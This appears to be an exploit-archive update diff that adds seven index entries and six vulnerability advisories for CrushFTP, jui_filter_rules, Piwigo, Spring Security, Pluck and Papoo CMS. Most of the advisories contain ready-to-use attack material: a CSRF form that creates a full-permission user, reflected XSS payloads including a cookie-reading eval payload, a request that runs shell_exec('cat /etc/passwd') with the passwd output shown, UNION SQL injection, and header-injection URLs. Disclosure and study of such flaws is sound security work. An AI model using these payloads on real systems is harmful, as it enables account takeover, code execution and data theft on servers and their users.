Update: 2015-02-21

7 new exploits

files.csv

@@ -31912,7 +31912,6 @@ id,file,description,date,author,platform,type,port
 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
 35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
 35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0
-35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0
 35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0
 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
@@ -32552,3 +32551,10 @@ id,file,description,date,author,platform,type,port
 36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 'themename' Parameter Cross Site Scripting Vulnerability",2011-09-05,"High-Tech Bridge SA",php,webapps,0
 36122,platforms/php/webapps/36122.txt,"SkaDate 'blogs.php' Cross Site Scripting Vulnerability",2011-09-08,sonyy,php,webapps,0
 36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 'cat' Parameter SQL Injection Vulnerability",2011-09-08,SubhashDasyam,php,webapps,0
+36124,platforms/php/remote/36124.txt,"jQuery jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80
+36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80
+36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080
+36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80
+36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
+36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0
+36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0

platforms/multiple/remote/36130.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/49535/info
+
+Spring Security is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sufficiently sanitize input.
+
+By inserting arbitrary headers into an HTTP response, attackers may be able to launch various attacks, including cross-site request forgery, cross-site scripting, and HTTP-request smuggling.
+
+The following versions are vulnerable:
+
+Spring Security 2.0.0 through 2.0.6
+Spring Security 3.0.0 through 3.0.5 
+
+http://www.example.com//mywebapp/logout/spring-security-redirect=%0d%0a%20NewHeader%3ainjectedValue 

platforms/multiple/webapps/36126.txt

@@ -0,0 +1,132 @@
+========================================================
+ I. Overview
+ ========================================================
+ Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been identified in
+ Crushftp 7.2.0 (Web Interface) on default configuration. These vulnerabilities allows
+ an attacker to gain control over valid user accounts, perform operations
+ on their behalf, redirect them to malicious sites, steal their credentials,
+ and more.
+ ========================================================
+ II. Severity
+ ========================================================
+ Rating: Medium
+ Remote: Yes
+ Authentication Require: Yes
+ ========================================================
+ III. Vendor's Description of Application
+ ========================================================
+ CrushFTP is a robust file transfer server that makes it easy to setup secure connections with your users.
+'Crush' comes from the built-in zip methods in CrushFTP. They allow for downloading files in compressed formats in-stream, 
+or even automatically expanding zip files as they are received in-stream. This is called ZipStreaming and can greatly accelerate 
+the transfer of many types of files.
+Secure management is web based allowing you the ability to manage and monitor the server from anywhere, or with almost any device. 
+Easy in place server upgrades without complicated installers. Runs as a daemon, or Windows service with no need for a local GUI.
+CrushFTP is watching out for you by detecting common hack attempts and robots which scan for weak passwords. It will automatically 
+protect you against DDoS attacks. No need for you to do anything as CrushFTP will automatically ban these IPs to prevent wasted logging and CPU usage. 
+This keeps your server secure from unwanted abuse.
+User management includes inheritance, groups, and virtual file systems. If you want simple user management, 
+it can be as easy as just making a folder with a specific name and nothing else. 
+Think about how easily you can delegate user administration with CrushFTP's role based administration and event configuration. 
+http://www.crushftp.com/index.html
+
+ ========================================================
+ IV. Vulnerability Details & Exploit
+ ========================================================
+
+ 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) 
+
+ a) An attacker may add/delete/modify user's accounts 
+ b) May change all configuration settings 
+
+Request Method: POST
+Location: /WebInterface/fuction/
+
+Proof of Concept:- 
+
+<html>
+
+ <body>
+ <form action="http://127.0.0.1:8080/WebInterface/function/" method="POST">
+ <input type="hidden" name="command" value="setUserItem" />
+ <input type="hidden" name="data&&95;action" value="new" />
+ <input type="hidden" name="serverGroup" value="MainUsers" />
+ <input type="hidden" name="username" value="Hacker" />
+ <input type="hidden" name="user" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><user&&32;type&&61;"properties"><username>Hacker<&&47;username><password>123456<&&47;password><max&&95;logins>0<&&47;max&&95;logins><root&&95;dir>&&47;<&&47;root&&95;dir><&&47;user>" />
+ <input type="hidden" name="xmlItem" value="user" />
+ <input type="hidden" name="vfs&&95;items" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><vfs&&32;type&&61;"properties"><&&47;vfs>" />
+ <input type="hidden" name="permissions" value="<&&63;xml&&32;version&&61;"1&&46;0"&&32;encoding&&61;"UTF&&45;8"&&63;><permissions&&32;type&&61;"properties"><item&&32;name&&61;"&&47;">&&40;read&&41;&&40;write&&41;&&40;view&&41;&&40;resume&&41;<&&47;item><&&47;permissions>" />
+ <input type="submit" value="Submit request" />
+ </form>
+ </body>
+</html>
+
+2) Multiple Cross-Site Scripting (Web Interface - Default Config)
+
+Type: Reflected
+Request Method: POST 
+Location: /WebInterface/function/ 
+Parameter: vfs_items
+Values: <?xml version="XSS PAYLOAD" encoding="XSS PAYLOAD"> 
+ vfs_items = <?xml version="XSS PAYLOAD" encoding="XSS PAYLOAD"> 
+
+
+Proof of Concept:
+
+POST /WebInterface/function/ HTTP/1.1
+Host: 127.0.0.1:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html
+Content-Length: 656
+Cookie: XXXXXXXXXXXXXXXXXXXXX
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0<a%20xmlns:a%3d'http://www.w3.org/1999/xhtml'><a:body%20onload%3d'alert(1)'/></a>%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E
+
+
+Type: Reflected
+Request Method: GET 
+Location: /WebInterface/function/ 
+Parameter: path
+Values: <script>alert(1)<%2fscript>
+ path=%<script>alert(1)<%2fscript>
+
+
+GET /WebInterface/function/?command=getXMLListing&format=JSONOBJ&path=%<script>alert(1)<%2fscript>&random=0.3300707341372783 HTTP/1.1
+Host: 127.0.0.1:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://127.0.0.1:8080/
+Cookie: XXXXXXXXXXXXXXXXXXXXXXXX
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+ ========================================================
+ VI. Affected Systems
+ ========================================================
+Software: Crushftp (Web Interface)
+Version: 7.2.0 Build : 147 < 7.3
+Configuration: Default
+ ========================================================
+ VII. Vendor Response/Solution
+ ========================================================
+
+ Vendor Contacted : 02/12/2015
+ Vendor Response : 02/12/2015
+ Solution : upgrade to 7.3 or change <csrf>true</csrf> in prefs.xml 
+
+ ========================================================
+ VIII. Credits
+ ========================================================
+ Discovered by Rehan Ahmed
+ knight_rehan@hotmail.com                 

platforms/php/remote/36124.txt

@@ -0,0 +1,218 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: RIPEMD160
+
+PHP Code Execution in jui_filter_rules Parsing Library
+======================================================
+Researcher: Timo Schmid <tschmid@ernw.de>
+
+
+Description
+===========
+jui_filter_rules[1] is a jQuery plugin which allows users to generate a
+ruleset
+which could be used to filter datasets inside a web application.
+
+The plugin also provides a PHP library to turn the user submitted
+ruleset into
+SQL where statements for server side filtering.
+This PHP library contains a feature which allows to convert the
+submitted filter
+values with server side functions. These functions can be specified
+within the
+ruleset, which leads to an arbitrary PHP code execution.
+
+
+Exploitation Technique
+======================
+Remote
+
+
+Severity Level
+==============
+Critical
+
+
+CVSS Base Score
+===============
+6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P)
+
+
+CVE-ID
+======
+<unassigned>
+
+
+Impact
+======
+By using the provided rule parsing library to generate SQL statements, an
+attacker is capable of executing arbitrary PHP code in the context of the
+web server. This could lead to a full compromise of the web server. The
+attack vector could be limited by existing validation mechanisms around the
+library, but this would require a partial manual parsing of the user
+supplied
+rules.
+
+
+Status
+======
+Reported
+
+
+Vulnerable Code Section
+=======================
+server_side/php/jui_filter_rules.php:
+[...]
+private function create_filter_value_sql($filter_type, $operator_type, ...
+[...]
+    if(is_array($filter_value_conversion_server_side)) {
+        $function_name =
+$filter_value_conversion_server_side['function_name'];
+        $args = $filter_value_conversion_server_side['args'];
+        $arg_len = count($args);
+        for($i = 0; $i < $vlen; $i++) {
+            // create arguments values for this filter value
+            $conversion_args = array();
+            for($a = 0; $a < $arg_len; $a++) {
+                if(array_key_exists('filter_value', $args[$a])) {
+                    array_push($conversion_args, $a_values[$i]);
+                }
+                if(array_key_exists('value', $args[$a])) {
+                    array_push($conversion_args, $args[$a]['value']);
+                }
+            }
+            // execute user function and assign return value to filter value
+            try {
+                $a_values[$i] = call_user_func_array($function_name,
+$conversion_args);
+            } catch(Exception $e) {
+                $this->last_error = array(
+                    'element_rule_id' => $element_rule_id,
+                    'error_message' => $e->getMessage()
+                );
+                break;
+            }
+        }
+    }
+[...]
+
+The provided PHP parsing library allows to specify a PHP function to convert
+the supplied filter value on the server side. This leads ultimatively to
+code
+execution through attacker supplied input. As no whitelist approach is used,
+any existing PHP function could be executed (including shell commands).
+
+
+Proof of Concept
+================
+Using the demo application from the git repository:
+
+Executing shell_exec('cat /etc/passwd')
+
+Request:
+POST /ajax_create_sql.dist.php HTTP/1.0
+host: http://www.example.com
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 471
+
+a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=she
+ll_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilte
+r_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpas
+swd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_
+ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bco
+ndition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=d
+ate
+
+Response:
+HTTP/1.1 200 OK
+Date: Tue, 13 Jan 2015 02:12:33 GMT
+Server: Apache/2.2.22 (Debian)
+Content-Length: 530
+Content-Type: text/html
+
+{"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin
+COSMOS:/root:/
+bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\ns
+ys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:ga
+mes:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/va
+r/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/s
+pool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:pr
+oxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"}
+
+
+
+Solution
+========
+This functionality should generally be removed or replaced by a mapping/
+whitelist approach and strict type filtering to prevent arbitrary code
+execution.
+
+
+Affected Versions
+=================
+>= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b
+< 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1)
+
+
+Timeline
+========
+2015-01-12: Vulnerability found
+2015-01-13: Developer informed
+2015-02-14: Fixed in version 1.0.6 (git
+0b61463cd02cc1814046b516242779b29ba7d1e1)
+
+
+References
+==========
+[1] http://www.pontikis.net/labs/jui_filter_rules
+[2] https://www.owasp.org/index.php/Code_Injection
+[3] https://www.ernw.de/download/BC-1501.txt
+[4] https://bufferoverflow.eu/BC-1501.txt
+
+
+Advisory-ID
+===========
+BC-1501
+
+
+Disclaimer
+==========
+The information herein contained may change without notice. Use of this
+information constitutes acceptance for use in an AS IS condition. There
+are NO
+warranties, implied or otherwise, with regard to this information or its
+use.
+Any use of this information is at the user's risk. In no event shall the
+author/
+distributor be held liable for any damages whatsoever arising out of or in
+connection with the use or spread of this information.
+
+- -- 
+Timo Schmid
+
+ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
+Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192
+PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
+
+Handelsregister Mannheim: HRB 337135
+Geschaeftsfuehrer: Enno Rey
+
+==============================================================
+|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
+==============================================================
+==================   TROOPERS15   ==================
+*   International IT Security Conference & Workshops
+*   16th - 20st March 2015 / Heidelberg, Germany
+*   www.troopers.de
+====================================================
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v2
+
+iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP
+YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x
+x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr
+bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa
+Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs
+AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds=
+=tnwW
+-----END PGP SIGNATURE-----

platforms/php/webapps/36125.txt

@@ -0,0 +1,57 @@
+[CVE-2015-1517] Piwigo - SQL Injection in Version 2.7.3
+
+----------------------------------------------------------------
+
+Product Information:
+
+Software: Piwigo 
+
+Tested Version: 2.7.3, released on 9 January 2015
+
+Vulnerability Type: SQL Injection (CWE-89)
+
+Download link: http://piwigo.org/basics/downloads
+
+Description: Piwigo is photo gallery software for the web, built by an active community of users and developers. Extensions make Piwigo easily customizable. Icing on the cake, Piwigo is free and opensource (copied from http://piwigo.org/)
+
+----------------------------------------------------------------
+
+Vulnerability description:
+
+When an authenticated user is navigating to "Photos/Batch Manager" he is able to apply different filters. When all filters are activated and the button "Refresh photo set" is executed, the following POST request is sent to the server:
+
+
+
+POST /piwigo-2.7.3/piwigo/admin.php?page=batch_manager HTTP/1.1
+Host: <IP>
+Content-Type: application/x-www-form-urlencoded
+Cookie: pwg_id=ri5ra17df1v20b0h51liekceu1; interface_language=s%3A2%3A%22en%22%3B
+
+filter_category_use=on&filter_level=1'&filter_level_include_lower=on&filter_dimension_min_width=600&filter_filesize_use=on&regenerateSuccess=0&filter_search_use=on&author=Type+the+author+name+here&filter_prefilter=caddie&title=Type+the+title+here&filter_dimension_min_ratio=1.25&level=4&tag_mode=OR&filter_prefilter_use=on&regenerateError=0&filter_filesize_min=0&filter_duplicates_date=on&remove_date_creation=on&date_creation=2015-02-06+00%3a00%3a00&submitFilter=Refresh+photo+set&filter_dimension_max_height=2300&filter_category_recursive=on&remove_title=on&filter_tags_use=on&filter_filesize_max=15.1&filter_dimension_max_width=3500&filter_dimension_max_ratio=1.78&selectAction=------------------&filter_dimension_use=on&remove_author=on&filter_duplicates_dimensions=on&start=0&filter_level_use=on&q=555-555-0199@example.com&confirm_deletion=on&filter_dimension_min_height=480
+
+
+This POST request is prone to boolean-based blind, error-based and AND/OR time-based blind SQL injection in the parameter filter_level. When adding a single quote a database error message can be provoked. 
+
+----------------------------------------------------------------
+
+Impact: 
+
+Direct database access is possible if an attacker is exploiting the SQL Injection vulnerability.
+
+----------------------------------------------------------------
+
+Solution:
+
+Update to the latest version, which is   2.7.4, see http://piwigo.org/basics/downloads.
+
+----------------------------------------------------------------
+
+Timeline:
+
+Vulnerability found: 6.2.2015
+Vendor informed: 6.2.2015
+Response by vendor: 7.2.2015
+Fix by vendor 12.2.2015
+Public Advisory: 18.2.2015
+
+----------------------------------------------------------------

platforms/php/webapps/36127.txt

@@ -0,0 +1,92 @@
+Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <=
+v. 2.7.3
+Advisory ID: SROEADV-2015-06
+Author: Steffen Rösemann
+Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
+Vendor URL: http://piwigo.org
+Vendor Status: patched
+CVE-ID: -
+
+==========================
+Vulnerability Description:
+==========================
+
+Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its
+administrative backend.
+
+==================
+Technical Details:
+==================
+
+The reflecting XSS vulnerability resides in the "page" parameter used in
+the file admin.php which can be found in the administrative backend located
+here in a common Piwigo installation:
+
+http://{TARGET}/admin.php?page=plugin-AdminTools
+
+Exploit-Example:
+
+http://
+{TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E
+
+The SQL injection vulnerability can as well be found in the administrative
+backend and can be found in the "History" functionality located here:
+
+http://{TARGET}/admin.php?page=history
+
+The SQL injection vulnerability can be exploited by appending arbitrary SQL
+statements in a POST request to the parameter "user":
+
+Exploit-Example:
+
+POST /piwigo/admin.php?page=history HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
+Firefox/31.0 Iceweasel/31.3.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
+Cookie: pwg_display_thumbnail=no_display_thumbnail;
+pwg_id=19rpao6bhdsn3l0u0o1im4m680;
+_pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 255
+
+start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2)
+AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --
+&image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit
+
+=========
+Solution:
+=========
+
+Install the latest version 2.7.4 (released 17th February 2015).
+
+
+====================
+Disclosure Timeline:
+====================
+08-Jan-2015 – found the vulnerability
+09-Jan-2015 - informed the developers
+09-Jan-2015 – release date of this security advisory [without technical
+details]
+09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
+17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
+17-Feb-2015 - release date of this security advisory
+17-Feb-2015 - send to FullDisclosure
+
+========
+Credits:
+========
+
+Vulnerability found and advisory written by Steffen Rösemann.
+
+===========
+References:
+===========
+
+[1] http://piwigo.org
+[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
+[3] http://piwigo.org/forum/viewtopic.php?id=25179

platforms/php/webapps/36129.txt

@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/49525/info
+
+Pluck is prone to multiple file-include and a file-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+An attacker can exploit local file-disclosure vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+Pluck 4.7 is vulnerable; other versions may also be affected. 
+
+1-File Inclusion:
+ 
+include(ALBUMS_DIR.'/'.$_GET['album'].'.php');
+ 
+Require:
+ 
+if (file_exists(ALBUMS_DIR.'/'.$_GET['album'].'.php')) {
+function albums_pages_site() {
+ 
+2-File Inclusion
+ 
+include (ALBUMS_DIR.'/'.$album['seoname'].'.php');
+foreach ($albums as $album) {
+$albums  = albums_get_albums();
+ 
+3-File Disclosure
+ 
+echo readfile('../../settings/modules/albums/'.$image);
+$image = $_GET['image'];
+ 
+requires:
+ 
+if (file_exists('../../settings/modules/albums/'.$image)) {

platforms/php/webapps/36131.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/49587/info
+
+Papoo CMS Light is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Papoo CMS Light 4.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/papoo/papoo_light/index.php/"></a><script>alert(document.cookie);</script>
+http://www.example.com/papoo/papoo_light/kontakt.php/"></a><script>alert(document.cookie);</script>
+http://www.example.com/papoo/papoo_light/inhalt.php/"></a><script>alert(document.cookie);</script>
+http://www.example.com/papoo/papoo_light/forum.php/"></a><script>alert(document.cookie);</script>
+http://www.example.com/papoo/papoo_light/guestbook.php/"></a><script>alert(document.cookie);</script>
+http://www.example.com/papoo/papoo_light/account.php/"></a><script>alert(document.cookie);</script>
+http://www.example.com/papoo/papoo_light/login.php/"></a><script>alert(document.cookie);</script>
+http://www.example.com/papoo/papoo_light/index/"></a><script>alert(document.cookie);</script>
+http://www.example.com/papoo/papoo_light/forumthread.php/"></a><script>alert(document.cookie);</script>
+http://www.example.com/papoo/papoo_light/forum/"></a><script>alert(document.cookie);</script>